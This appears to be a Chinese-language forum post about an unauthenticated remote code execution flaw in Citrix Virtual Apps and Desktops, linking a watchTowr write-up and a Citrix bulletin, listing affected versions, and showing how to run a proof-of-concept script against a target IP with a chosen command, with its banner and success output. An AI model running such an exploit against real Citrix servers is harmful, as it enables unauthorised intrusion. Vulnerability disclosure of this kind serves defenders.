Citrix虚拟应用程序和桌面(XEN)未经身份验证的RCE远程代码执行漏洞(Exp)
漏洞简述
Citrix Virtual Apps and Desktops (XEN) 未经身份验证的RCE远程代码执行漏洞(CVE未知),了解更多技术细节可看watchTowrLabs的文章。https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/
影响版本
Citrix Virtual Apps and Desktops 7 2402 LTSR 及之前的任何版本都存在此漏洞,更多详细信息请参阅citrix公告。
https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US
POC使用
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
__ ______________
_________ _/|__ ____ ||_\__ ____\_____________
\ \/ \/ \__\ ___/ ___\||\| | /_ \ \/ \/ \___ \
\ / / __ \|| \\___| Y| |(<_> \ / || \/
\/\_/ (____|__|\___|___|__|__| \__/ \/\_/|__|
\/ \/ \/
CVE-xxxx-xxxxx.py
(*) Citrix Virtual Apps and Desktops Unauthenticated Remote Code Execution (CVE-xxxx-xxxxx) exploit by watchTowr
- Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
CVEs:
Command sent to 192.168.1.120 successfully!
页:
[1]